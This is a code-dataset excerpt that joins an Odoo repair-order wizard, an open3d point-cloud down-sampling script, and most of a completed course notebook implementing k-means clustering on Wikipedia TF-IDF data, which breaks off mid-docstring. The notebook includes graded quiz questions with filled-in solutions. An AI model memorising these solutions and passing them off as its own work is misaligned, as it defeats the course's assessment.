mechanic_ids = fields.Many2many('hr.employee', string="Assign Mechanic")
repair_id = fields.Many2one("repair.order")
def assign_mechanic(self):
"""
Assign mechanic to the repair.order.
"""
self.repair_id.mechanic_ids = [(6, 0, self.mechanic_ids.ids)]
return True
class AssignBayWizard(models.TransientModel):
    _name = 'assign.bay.wizard'
_description = 'Assign Bay Wizard'
# relations
bay_id = fields.Many2one("bay", "Bay")
repair_id = fields.Many2one("repair.order")
def assign_bay(self):
"""
Assign bay to the repair.order.
"""
self.repair_id.assign_bay_id = self.bay_id
return True | 27.757576 | 76 | 0.648472 | 106 | 916 | 5.433962 | 0.349057 | 0.121528 | 0.083333 | 0.104167 | 0.243056 | 0.243056 | 0.243056 | 0.145833 | 0 | 0 | 0 | 0.009957 | 0.232533 | 916 | 33 | 77 | 27.757576 | 0.809388 | 0.121179 | 0 | 0.235294 | 0 | 0 | 0.177015 | 0.029062 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.058824 | 0 | 0.882353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d315ddafc00e303827ed142f393b01062bb40a46 | 720 | py | Python | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | 3 | 2022-01-16T12:43:29.000Z | 2022-01-22T05:21:40.000Z | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import open3d as o3d
def downSample(pointcloud_file_path, down_sample_cluster_num, save_pointcloud_file_path):
print("[INFO][downSample]")
print("\t start down sampling pointcloud :")
print("\t down_sample_cluster_num = " + str(down_sample_cluster_num) + "...")
pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
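    # open3d's uniform_down_sample keeps every k-th point (in point order),
    # so a larger down_sample_cluster_num keeps fewer points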
down_sampled_pointcloud = o3d.geometry.PointCloud.uniform_down_sample(
pointcloud, down_sample_cluster_num)
o3d.io.write_point_cloud(
save_pointcloud_file_path,
down_sampled_pointcloud,
write_ascii=True,
print_progress=True)
print("SUCCESS!")
return True
| 31.304348 | 89 | 0.722222 | 92 | 720 | 5.271739 | 0.434783 | 0.103093 | 0.148454 | 0.164948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010067 | 0.172222 | 720 | 22 | 90 | 32.727273 | 0.803691 | 0.058333 | 0 | 0 | 0 | 0 | 0.137778 | 0.034074 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3162e78a871415bab1f9452d82a894abaab0f56 | 44,224 | py | Python | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington1 | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | 20 | 2017-04-06T08:50:58.000Z | 2021-11-01T13:43:22.000Z | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | null | null | null | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | 24 | 2016-06-01T21:28:17.000Z | 2021-10-02T03:17:11.000Z |
# coding: utf-8
# # k-means with text data
# In this assignment you will
# * Cluster Wikipedia documents using k-means
# * Explore the role of random initialization on the quality of the clustering
# * Explore how results differ after changing the number of clusters
# * Evaluate clustering, both quantitatively and qualitatively
#
# When properly executed, clustering uncovers valuable insights from a set of unlabeled documents.
# **Note to Amazon EC2 users**: To conserve memory, make sure to stop all the other notebooks before running this notebook.
# ## Import necessary packages
# The following code block will check if you have the correct version of GraphLab Create. Any version later than 1.8.5 will do. To upgrade, read [this page](https://turi.com/download/upgrade-graphlab-create.html).
# In[1]:
import os
os.environ["OMP_NUM_THREADS"] = "1"
import graphlab
graphlab.SArray(range(1000)).apply(lambda x: x)
# In[2]:
import matplotlib.pyplot as plt
import numpy as np
import sys
import os
from scipy.sparse import csr_matrix
get_ipython().magic(u'matplotlib inline')
'''Check GraphLab Create version'''
from distutils.version import StrictVersion
assert (StrictVersion(graphlab.version) >= StrictVersion('1.8.5')), 'GraphLab Create must be version 1.8.5 or later.'
# ## Load data, extract features
# To work with text data, we must first convert the documents into numerical features. As in the first assignment, let's extract TF-IDF features for each article.
# In[3]:
wiki = graphlab.SFrame('people_wiki.gl/')
# In[4]:
wiki['tf_idf'] = graphlab.text_analytics.tf_idf(wiki['text'])
# For the remainder of the assignment, we will use sparse matrices. Sparse matrices are matrices that have a small number of nonzero entries. A good data structure for sparse matrices would only store the nonzero entries to save space and speed up computation. SciPy provides a highly-optimized library for sparse matrices. Many matrix operations available for NumPy arrays are also available for SciPy sparse matrices.
#
# We first convert the TF-IDF column (in dictionary format) into the SciPy sparse matrix format. We included plenty of comments for the curious; if you'd like, you may skip the next block and treat the function as a black box.
# In[5]:
def sframe_to_scipy(x, column_name):
'''
Convert a dictionary column of an SFrame into a sparse matrix format where
each (row_id, column_id, value) triple corresponds to the value of
x[row_id][column_id], where column_id is a key in the dictionary.
Example
>>> sparse_matrix, map_key_to_index = sframe_to_scipy(sframe, column_name)
'''
assert x[column_name].dtype() == dict, 'The chosen column must be dict type, representing sparse data.'
# Create triples of (row_id, feature_id, count).
# 1. Add a row number.
x = x.add_row_number()
# 2. Stack will transform x to have a row for each unique (row, key) pair.
x = x.stack(column_name, ['feature', 'value'])
# Map words into integers using a OneHotEncoder feature transformation.
f = graphlab.feature_engineering.OneHotEncoder(features=['feature'])
# 1. Fit the transformer using the above data.
f.fit(x)
# 2. The transform takes 'feature' column and adds a new column 'feature_encoding'.
x = f.transform(x)
# 3. Get the feature mapping.
mapping = f['feature_encoding']
# 4. Get the feature id to use for each key.
x['feature_id'] = x['encoded_features'].dict_keys().apply(lambda x: x[0])
# Create numpy arrays that contain the data for the sparse matrix.
i = np.array(x['id'])
j = np.array(x['feature_id'])
v = np.array(x['value'])
width = x['id'].max() + 1
height = x['feature_id'].max() + 1
# Create a sparse matrix.
mat = csr_matrix((v, (i, j)), shape=(width, height))
return mat, mapping
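
# For intuition about the `(values, (rows, cols))` constructor used above,
# here is a tiny self-contained example (the numbers are made up):

# In[ ]:

demo = csr_matrix(([1.0, 2.0, 3.0], ([0, 0, 1], [0, 2, 1])), shape=(2, 3))
print(demo.toarray())  # [[ 1.  0.  2.]
                       #  [ 0.  3.  0.]]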
# In[6]:
# The conversion will take about a minute or two.
tf_idf, map_index_to_word = sframe_to_scipy(wiki, 'tf_idf')
# In[7]:
tf_idf
# The above matrix contains a TF-IDF score for each of the 59071 pages in the data set and each of the 547979 unique words.
# ## Normalize all vectors
# As discussed in the previous assignment, Euclidean distance can be a poor metric of similarity between documents, as it unfairly penalizes long articles. For a reasonable assessment of similarity, we should disregard the length information and use length-agnostic metrics, such as cosine distance.
#
# The k-means algorithm does not directly work with cosine distance, so we take an alternative route to remove length information: we normalize all vectors to be unit length. It turns out that Euclidean distance closely mimics cosine distance when all vectors are unit length. In particular, the squared Euclidean distance between any two vectors of length one is directly proportional to their cosine distance.
#
# We can prove this as follows. Let $\mathbf{x}$ and $\mathbf{y}$ be normalized vectors, i.e. unit vectors, so that $\|\mathbf{x}\|=\|\mathbf{y}\|=1$. Write the squared Euclidean distance as the dot product of $(\mathbf{x} - \mathbf{y})$ to itself:
# \begin{align*}
# \|\mathbf{x} - \mathbf{y}\|^2 &= (\mathbf{x} - \mathbf{y})^T(\mathbf{x} - \mathbf{y})\\
# &= (\mathbf{x}^T \mathbf{x}) - 2(\mathbf{x}^T \mathbf{y}) + (\mathbf{y}^T \mathbf{y})\\
# &= \|\mathbf{x}\|^2 - 2(\mathbf{x}^T \mathbf{y}) + \|\mathbf{y}\|^2\\
# &= 2 - 2(\mathbf{x}^T \mathbf{y})\\
# &= 2(1 - (\mathbf{x}^T \mathbf{y}))\\
# &= 2\left(1 - \frac{\mathbf{x}^T \mathbf{y}}{\|\mathbf{x}\|\|\mathbf{y}\|}\right)\\
# &= 2\left[\text{cosine distance}\right]
# \end{align*}
#
# This tells us that two **unit vectors** that are close in Euclidean distance are also close in cosine distance. Thus, the k-means algorithm (which naturally uses Euclidean distances) on normalized vectors will produce the same results as clustering using cosine distance as a distance metric.
#
# We import the [`normalize()` function](http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.normalize.html) from scikit-learn to normalize all vectors to unit length.
# In[8]:
from sklearn.preprocessing import normalize
tf_idf = normalize(tf_idf)
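
# As a quick sanity check of the identity derived above, we can verify on one
# arbitrary pair of rows (0 and 1 here) that the squared Euclidean distance
# between unit vectors equals twice their cosine distance:

# In[ ]:

from sklearn.metrics.pairwise import pairwise_distances, cosine_distances
d_euc_sq = pairwise_distances(tf_idf[0], tf_idf[1], metric='euclidean')[0, 0]**2
d_cos = cosine_distances(tf_idf[0], tf_idf[1])[0, 0]
print(d_euc_sq, 2 * d_cos)  # the two numbers should agree up to float error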
# ## Implement k-means
# Let us implement the k-means algorithm. First, we choose an initial set of centroids. A common practice is to choose randomly from the data points.
#
# **Note:** We specify a seed here, so that everyone gets the same answer. In practice, we highly recommend to use different seeds every time (for instance, by using the current timestamp).
# In[9]:
def get_initial_centroids(data, k, seed=None):
'''Randomly choose k data points as initial centroids'''
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
n = data.shape[0] # number of data points
# Pick K indices from range [0, N).
rand_indices = np.random.randint(0, n, k)
# Keep centroids as dense format, as many entries will be nonzero due to averaging.
# As long as at least one document in a cluster contains a word,
# it will carry a nonzero weight in the TF-IDF vector of the centroid.
centroids = data[rand_indices,:].toarray()
return centroids
# After initialization, the k-means algorithm iterates between the following two steps:
# 1. Assign each data point to the closest centroid.
# $$
# z_i \gets \mathrm{argmin}_j \|\mu_j - \mathbf{x}_i\|^2
# $$
# 2. Revise centroids as the mean of the assigned data points.
# $$
# \mu_j \gets \frac{1}{n_j}\sum_{i:z_i=j} \mathbf{x}_i
# $$
# In pseudocode, we iteratively do the following:
# ```
# cluster_assignment = assign_clusters(data, centroids)
# centroids = revise_centroids(data, k, cluster_assignment)
# ```
# ### Assigning clusters
# How do we implement Step 1 of the main k-means loop above? First import `pairwise_distances` function from scikit-learn, which calculates Euclidean distances between rows of given arrays. See [this documentation](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.pairwise_distances.html) for more information.
#
# For the sake of demonstration, let's look at documents 100 through 102 as query documents and compute the distances between each of these documents and every other document in the corpus. In the k-means algorithm, we will have to compute pairwise distances between the set of centroids and the set of documents.
# In[10]:
from sklearn.metrics import pairwise_distances
# Get the TF-IDF vectors for documents 100 through 102.
queries = tf_idf[100:102,:]
# Compute pairwise distances from every data point to each query vector.
dist = pairwise_distances(tf_idf, queries, metric='euclidean')
print dist
# More formally, `dist[i,j]` is assigned the distance between the `i`th row of `X` (i.e., `X[i,:]`) and the `j`th row of `Y` (i.e., `Y[j,:]`).
# **Checkpoint:** For a moment, suppose that we initialize three centroids with the first 3 rows of `tf_idf`. Write code to compute distances from each of the centroids to all data points in `tf_idf`. Then find the distance between row 430 of `tf_idf` and the second centroid and save it to `dist`.
# In[14]:
# Students should write code here
centroids = tf_idf[:3,:]
distances = pairwise_distances(tf_idf, centroids, metric='euclidean')
distances.shape
# In[15]:
dist = distances[430, 1]
# In[16]:
'''Test cell'''
if np.allclose(dist, pairwise_distances(tf_idf[430,:], tf_idf[1,:])):
print('Pass')
else:
print('Check your code again')
# **Checkpoint:** Next, given the pairwise distances, we take the minimum of the distances for each data point. Fittingly, NumPy provides an `argmin` function. See [this documentation](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.argmin.html) for details.
#
# Read the documentation and write code to produce a 1D array whose i-th entry indicates the centroid that is the closest to the i-th data point. Use the list of distances from the previous checkpoint and save them as `distances`. The value 0 indicates closeness to the first centroid, 1 indicates closeness to the second centroid, and so forth. Save this array as `closest_cluster`.
#
# **Hint:** the resulting array should be as long as the number of data points.
# In[17]:
# Students should write code here
closest_cluster = np.argmin(distances, axis=1)
# In[18]:
'''Test cell'''
reference = [list(row).index(min(row)) for row in distances]
if np.allclose(closest_cluster, reference):
print('Pass')
else:
print('Check your code again')
# **Checkpoint:** Let's put these steps together. First, initialize three centroids with the first 3 rows of `tf_idf`. Then, compute distances from each of the centroids to all data points in `tf_idf`. Finally, use these distance calculations to compute cluster assignments and assign them to `cluster_assignment`.
# In[19]:
# Students should write code here
centroids = tf_idf[:3,:]
distances = pairwise_distances(tf_idf, centroids, metric='euclidean')
cluster_assignment = np.argmin(distances, axis=1)
# In[20]:
if len(cluster_assignment)==59071 and np.array_equal(np.bincount(cluster_assignment), np.array([23061, 10086, 25924])):
print('Pass') # count number of data points for each cluster
else:
print('Check your code again.')
# Now we are ready to fill in the blanks in this function:
# In[21]:
def assign_clusters(data, centroids):
# Compute distances between each data point and the set of centroids:
# Fill in the blank (RHS only)
distances_from_centroids = pairwise_distances(data, centroids, metric='euclidean')
# Compute cluster assignments for each data point:
# Fill in the blank (RHS only)
cluster_assignment = np.argmin(distances_from_centroids, axis=1)
return cluster_assignment
# **Checkpoint**. For the last time, let us check if Step 1 was implemented correctly. With rows 0, 2, 4, and 6 of `tf_idf` as an initial set of centroids, we assign cluster labels to rows 0, 10, 20, ..., and 90 of `tf_idf`. The resulting cluster labels should be `[0, 1, 1, 0, 0, 2, 0, 2, 2, 1]`.
# In[22]:
if np.allclose(assign_clusters(tf_idf[0:100:10], tf_idf[0:8:2]), np.array([0, 1, 1, 0, 0, 2, 0, 2, 2, 1])):
print('Pass')
else:
print('Check your code again.')
# ### Revising clusters
# Let's turn to Step 2, where we compute the new centroids given the cluster assignments.
# SciPy and NumPy arrays allow for filtering via Boolean masks. For instance, we filter all data points that are assigned to cluster 0 by writing
# ```
# data[cluster_assignment==0,:]
# ```
# To develop intuition about filtering, let's look at a toy example consisting of 3 data points and 2 clusters.
# In[23]:
data = np.array([[1., 2., 0.],
[0., 0., 0.],
[2., 2., 0.]])
centroids = np.array([[0.5, 0.5, 0.],
[0., -0.5, 0.]])
# Let's assign these data points to the closest centroid.
# In[24]:
cluster_assignment = assign_clusters(data, centroids)
print cluster_assignment
# The expression `cluster_assignment==1` gives a list of Booleans that says whether each data point is assigned to cluster 1 or not:
# In[25]:
cluster_assignment==1
# Likewise for cluster 0:
# In[27]:
cluster_assignment==0
# In lieu of indices, we can put in the list of Booleans to pick and choose rows. Only the rows that correspond to a `True` entry will be retained.
#
# First, let's look at the data points (i.e., their values) assigned to cluster 1:
# In[28]:
data[cluster_assignment==1]
# This makes sense since [0 0 0] is closer to [0 -0.5 0] than to [0.5 0.5 0].
#
# Now let's look at the data points assigned to cluster 0:
# In[29]:
data[cluster_assignment==0]
# Again, this makes sense since these values are each closer to [0.5 0.5 0] than to [0 -0.5 0].
#
# Given all the data points in a cluster, it only remains to compute the mean. Use [np.mean()](http://docs.scipy.org/doc/numpy-1.10.0/reference/generated/numpy.mean.html). By default, the function averages all elements in a 2D array. To compute row-wise or column-wise means, add the `axis` argument. See the linked documentation for details.
#
# Use this function to average the data points in cluster 0:
# In[30]:
data[cluster_assignment==0].mean(axis=0)
# We are now ready to complete this function:
# In[31]:
def revise_centroids(data, k, cluster_assignment):
new_centroids = []
for i in xrange(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i]
# Compute the mean of the data points. Fill in the blank (RHS only)
centroid = member_data_points.mean(axis=0)
# Convert numpy.matrix type to numpy.ndarray type
centroid = centroid.A1
new_centroids.append(centroid)
new_centroids = np.array(new_centroids)
return new_centroids
# **Checkpoint**. Let's check our Step 2 implementation. Letting rows 0, 10, ..., 90 of `tf_idf` as the data points and the cluster labels `[0, 1, 1, 0, 0, 2, 0, 2, 2, 1]`, we compute the next set of centroids. Each centroid is given by the average of all member data points in corresponding cluster.
# In[32]:
result = revise_centroids(tf_idf[0:100:10], 3, np.array([0, 1, 1, 0, 0, 2, 0, 2, 2, 1]))
if np.allclose(result[0], np.mean(tf_idf[[0,30,40,60]].toarray(), axis=0)) and np.allclose(result[1], np.mean(tf_idf[[10,20,90]].toarray(), axis=0)) and np.allclose(result[2], np.mean(tf_idf[[50,70,80]].toarray(), axis=0)):
print('Pass')
else:
print('Check your code')
# ### Assessing convergence
# How can we tell if the k-means algorithm is converging? We can look at the cluster assignments and see if they stabilize over time. In fact, we'll be running the algorithm until the cluster assignments stop changing at all. To be extra safe, and to assess the clustering performance, we'll be looking at an additional criteria: the sum of all squared distances between data points and centroids. This is defined as
# $$
# J(\mathcal{Z},\mu) = \sum_{j=1}^k \sum_{i:z_i = j} \|\mathbf{x}_i - \mu_j\|^2.
# $$
# The smaller the distances, the more homogeneous the clusters are. In other words, we'd like to have "tight" clusters.
# In[33]:
def compute_heterogeneity(data, k, centroids, cluster_assignment):
heterogeneity = 0.0
for i in xrange(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment==i, :]
if member_data_points.shape[0] > 0: # check if i-th cluster is non-empty
# Compute distances from centroid to data points (RHS only)
distances = pairwise_distances(member_data_points, [centroids[i]], metric='euclidean')
squared_distances = distances**2
heterogeneity += np.sum(squared_distances)
return heterogeneity
# Let's compute the cluster heterogeneity for the 2-cluster example we've been considering based on our current cluster assignments and centroids.
# In[34]:
compute_heterogeneity(data, 2, centroids, cluster_assignment)
# ### Combining into a single function
# Once the two k-means steps have been implemented, as well as our heterogeneity metric we wish to monitor, it is only a matter of putting these functions together to write a k-means algorithm that
#
# * Repeatedly performs Steps 1 and 2
# * Tracks convergence metrics
# * Stops if either no assignment changed or we reach a certain number of iterations.
# In[35]:
# Fill in the blanks
def kmeans(data, k, initial_centroids, maxiter, record_heterogeneity=None, verbose=False):
'''This function runs k-means on given data and initial set of centroids.
maxiter: maximum number of iterations to run.
record_heterogeneity: (optional) a list, to store the history of heterogeneity as function of iterations
if None, do not store the history.
verbose: if True, print how many data points changed their cluster labels in each iteration'''
centroids = initial_centroids[:]
prev_cluster_assignment = None
for itr in xrange(maxiter):
if verbose:
print(itr)
# 1. Make cluster assignments using nearest centroids
# YOUR CODE HERE
cluster_assignment = assign_clusters(data, centroids)
# 2. Compute a new centroid for each of the k clusters, averaging all data points assigned to that cluster.
# YOUR CODE HERE
centroids = revise_centroids(data, k, cluster_assignment)
# Check for convergence: if none of the assignments changed, stop
if prev_cluster_assignment is not None and (prev_cluster_assignment==cluster_assignment).all():
break
# Print number of new assignments
if prev_cluster_assignment is not None:
num_changed = np.sum(prev_cluster_assignment!=cluster_assignment)
if verbose:
print(' {0:5d} elements changed their cluster assignment.'.format(num_changed))
# Record heterogeneity convergence metric
if record_heterogeneity is not None:
# YOUR CODE HERE
score = compute_heterogeneity(data, k, centroids, cluster_assignment)
record_heterogeneity.append(score)
prev_cluster_assignment = cluster_assignment[:]
return centroids, cluster_assignment
# ## Plotting convergence metric
# We can use the above function to plot the convergence metric across iterations.
# In[36]:
def plot_heterogeneity(heterogeneity, k):
plt.figure(figsize=(7,4))
plt.plot(heterogeneity, linewidth=4)
plt.xlabel('# Iterations')
plt.ylabel('Heterogeneity')
plt.title('Heterogeneity of clustering over time, K={0:d}'.format(k))
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
# Let's consider running k-means with K=3 clusters for a maximum of 400 iterations, recording cluster heterogeneity at every step. Then, let's plot the heterogeneity over iterations using the plotting function above.
# In[37]:
k = 3
heterogeneity = []
initial_centroids = get_initial_centroids(tf_idf, k, seed=0)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=heterogeneity, verbose=True)
plot_heterogeneity(heterogeneity, k)
# **Quiz Question**. (True/False) The clustering objective (heterogeneity) is non-increasing for this example.
# **Quiz Question**. Let's step back from this particular example. If the clustering objective (heterogeneity) would ever increase when running k-means, that would indicate: (choose one)
#
# 1. k-means algorithm got stuck in a bad local minimum
# 2. There is a bug in the k-means code
# 3. All data points consist of exact duplicates
# 4. Nothing is wrong. The objective should generally go down sooner or later.
# **Quiz Question**. Which of the cluster contains the greatest number of data points in the end? Hint: Use [`np.bincount()`](http://docs.scipy.org/doc/numpy-1.11.0/reference/generated/numpy.bincount.html) to count occurrences of each cluster label.
# 1. Cluster #0
# 2. Cluster #1
# 3. Cluster #2
# In[38]:
np.bincount(cluster_assignment)
# ## Beware of local maxima
# One weakness of k-means is that it tends to get stuck in a local minimum. To see this, let us run k-means multiple times, with different initial centroids created using different random seeds.
#
# **Note:** Again, in practice, you should set different seeds for every run. We give you a list of seeds for this assignment so that everyone gets the same answer.
#
# This may take several minutes to run.
# In[40]:
k = 10
heterogeneity = {}
import time
start = time.time()
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
initial_centroids = get_initial_centroids(tf_idf, k, seed)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
heterogeneity[seed] = compute_heterogeneity(tf_idf, k, centroids, cluster_assignment)
# New line for quiz question
print('seed={0:06d}, heterogeneity={1:.5f}, max cluster size={2}'.format(seed, heterogeneity[seed], max(np.bincount(cluster_assignment))))
sys.stdout.flush()
end = time.time()
print(end-start)
# Notice the variation in heterogeneity for different initializations. This indicates that k-means sometimes gets stuck at a bad local minimum.
# **Quiz Question**. Another way to capture the effect of changing initialization is to look at the distribution of cluster assignments. Add a line to the code above to compute the size (# of member data points) of clusters for each run of k-means. Look at the size of the largest cluster (most # of member data points) across multiple runs, with seeds 0, 20000, ..., 120000. How much does this measure vary across the runs? What is the minimum and maximum values this quantity takes?
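
# If you would rather collect these sizes programmatically than read them off
# the printout above, here is a minimal sketch; it simply repeats the same
# seven runs, so it takes several minutes and is not part of the original code.

# In[ ]:

largest_cluster_size = {}
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
    initial_centroids = get_initial_centroids(tf_idf, k, seed)
    _, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400)
    largest_cluster_size[seed] = max(np.bincount(cluster_assignment))
print(min(largest_cluster_size.values()), max(largest_cluster_size.values()))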
# One effective way to counter this tendency is to use **k-means++** to provide a smart initialization. This method tries to spread out the initial set of centroids so that they are not too close together. It is known to improve the quality of local optima and lower average runtime.
# In[41]:
def smart_initialize(data, k, seed=None):
'''Use k-means++ to initialize a good set of centroids'''
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
centroids = np.zeros((k, data.shape[1]))
# Randomly choose the first centroid.
# Since we have no prior knowledge, choose uniformly at random
idx = np.random.randint(data.shape[0])
centroids[0] = data[idx,:].toarray()
# Compute distances from the first centroid chosen to all the other data points
squared_distances = pairwise_distances(data, centroids[0:1], metric='euclidean').flatten()**2
for i in xrange(1, k):
# Choose the next centroid randomly, so that the probability for each data point to be chosen
# is directly proportional to its squared distance from the nearest centroid.
        # Roughly speaking, a new centroid should be as far from the other centroids as possible.
idx = np.random.choice(data.shape[0], 1, p=squared_distances/sum(squared_distances))
centroids[i] = data[idx,:].toarray()
# Now compute distances from the centroids to all data points
squared_distances = np.min(pairwise_distances(data, centroids[0:i+1], metric='euclidean')**2,axis=1)
return centroids
# Let's now rerun k-means with 10 clusters using the same set of seeds, but always using k-means++ to initialize the algorithm.
#
# This may take several minutes to run.
# In[42]:
k = 10
heterogeneity_smart = {}
start = time.time()
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
initial_centroids = smart_initialize(tf_idf, k, seed)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
heterogeneity_smart[seed] = compute_heterogeneity(tf_idf, k, centroids, cluster_assignment)
print('seed={0:06d}, heterogeneity={1:.5f}'.format(seed, heterogeneity_smart[seed]))
sys.stdout.flush()
end = time.time()
print(end-start)
# Let's compare the set of cluster heterogeneities we got from our 7 restarts of k-means using random initialization compared to the 7 restarts of k-means using k-means++ as a smart initialization.
#
# The following code produces a [box plot](http://matplotlib.org/api/pyplot_api.html) for each of these methods, indicating the spread of values produced by each method.
# In[43]:
plt.figure(figsize=(8,5))
plt.boxplot([heterogeneity.values(), heterogeneity_smart.values()], vert=False)
plt.yticks([1, 2], ['k-means', 'k-means++'])
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
# A few things to notice from the box plot:
# * On average, k-means++ produces a better clustering than Random initialization.
# * Variation in clustering quality is smaller for k-means++.
# **In general, you should run k-means at least a few times with different initializations and then return the run resulting in the lowest heterogeneity.** Let us write a function that runs k-means multiple times and picks the best run that minimizes heterogeneity. The function accepts an optional list of seed values to be used for the multiple runs; if no such list is provided, the current UTC time is used as seed values.
# In[44]:
def kmeans_multiple_runs(data, k, maxiter, num_runs, seed_list=None, verbose=False):
heterogeneity = {}
min_heterogeneity_achieved = float('inf')
best_seed = None
final_centroids = None
final_cluster_assignment = None
for i in xrange(num_runs):
# Use UTC time if no seeds are provided
if seed_list is not None:
seed = seed_list[i]
np.random.seed(seed)
else:
seed = int(time.time())
np.random.seed(seed)
# Use k-means++ initialization
# YOUR CODE HERE
initial_centroids = smart_initialize(data, k, seed)
# Run k-means
# YOUR CODE HERE
centroids, cluster_assignment = kmeans(data, k, initial_centroids, maxiter, record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
# YOUR CODE HERE
heterogeneity[seed] = compute_heterogeneity(data, k, centroids, cluster_assignment)
if verbose:
print('seed={0:06d}, heterogeneity={1:.5f}'.format(seed, heterogeneity[seed]))
sys.stdout.flush()
# if current measurement of heterogeneity is lower than previously seen,
# update the minimum record of heterogeneity.
if heterogeneity[seed] < min_heterogeneity_achieved:
min_heterogeneity_achieved = heterogeneity[seed]
best_seed = seed
final_centroids = centroids
final_cluster_assignment = cluster_assignment
# Return the centroids and cluster assignments that minimize heterogeneity.
return final_centroids, final_cluster_assignment
# ## How to choose K
# Since we are measuring the tightness of the clusters, a higher value of K reduces the possible heterogeneity metric by definition. For example, if we have N data points and set K=N clusters, then we could have 0 cluster heterogeneity by setting the N centroids equal to the values of the N data points. (Note: Not all runs for larger K will result in lower heterogeneity than a single run with smaller K due to local optima.) Let's explore this general trend for ourselves by performing the following analysis.
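
# We can see the K=N extreme concretely on the 3-point toy array `data` from
# the boolean-mask example above: with every point serving as its own
# centroid, the heterogeneity is exactly zero.

# In[ ]:

toy_assignment = np.array([0, 1, 2])  # each data point is its own cluster
print(compute_heterogeneity(data, 3, data, toy_assignment))  # prints 0.0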
# Use the `kmeans_multiple_runs` function to run k-means with five different values of K. For each K, use k-means++ and multiple runs to pick the best solution. In what follows, we consider K=2,10,25,50,100 and 7 restarts for each setting.
#
# **IMPORTANT: The code block below will take about one hour to finish. We highly suggest that you use the arrays that we have computed for you.**
#
# Side note: In practice, a good implementation of k-means would utilize parallelism to run multiple runs of k-means at once. For an example, see [scikit-learn's KMeans](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html).
# In[ ]:
#def plot_k_vs_heterogeneity(k_values, heterogeneity_values):
# plt.figure(figsize=(7,4))
# plt.plot(k_values, heterogeneity_values, linewidth=4)
# plt.xlabel('K')
# plt.ylabel('Heterogeneity')
# plt.title('K vs. Heterogeneity')
# plt.rcParams.update({'font.size': 16})
# plt.tight_layout()
#start = time.time()
#centroids = {}
#cluster_assignment = {}
#heterogeneity_values = []
#k_list = [2, 10, 25, 50, 100]
#seed_list = [0, 20000, 40000, 60000, 80000, 100000, 120000]
#for k in k_list:
# heterogeneity = []
# centroids[k], cluster_assignment[k] = kmeans_multiple_runs(tf_idf, k, maxiter=400,
# num_runs=len(seed_list),
# seed_list=seed_list,
# verbose=True)
# score = compute_heterogeneity(tf_idf, k, centroids[k], cluster_assignment[k])
# heterogeneity_values.append(score)
#plot_k_vs_heterogeneity(k_list, heterogeneity_values)
#end = time.time()
#print(end-start)
# To use the pre-computed NumPy arrays, first download kmeans-arrays.npz as mentioned in the reading for this assignment and load them with the following code. Make sure the downloaded file is in the same directory as this notebook.
# In[45]:
def plot_k_vs_heterogeneity(k_values, heterogeneity_values):
plt.figure(figsize=(7,4))
plt.plot(k_values, heterogeneity_values, linewidth=4)
plt.xlabel('K')
plt.ylabel('Heterogeneity')
plt.title('K vs. Heterogeneity')
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
filename = 'kmeans-arrays.npz'
heterogeneity_values = []
k_list = [2, 10, 25, 50, 100]
if os.path.exists(filename):
arrays = np.load(filename)
centroids = {}
cluster_assignment = {}
for k in k_list:
        print(k)
sys.stdout.flush()
'''To save memory space, do not load the arrays from the file right away. We use
a technique known as lazy evaluation, where some expressions are not evaluated
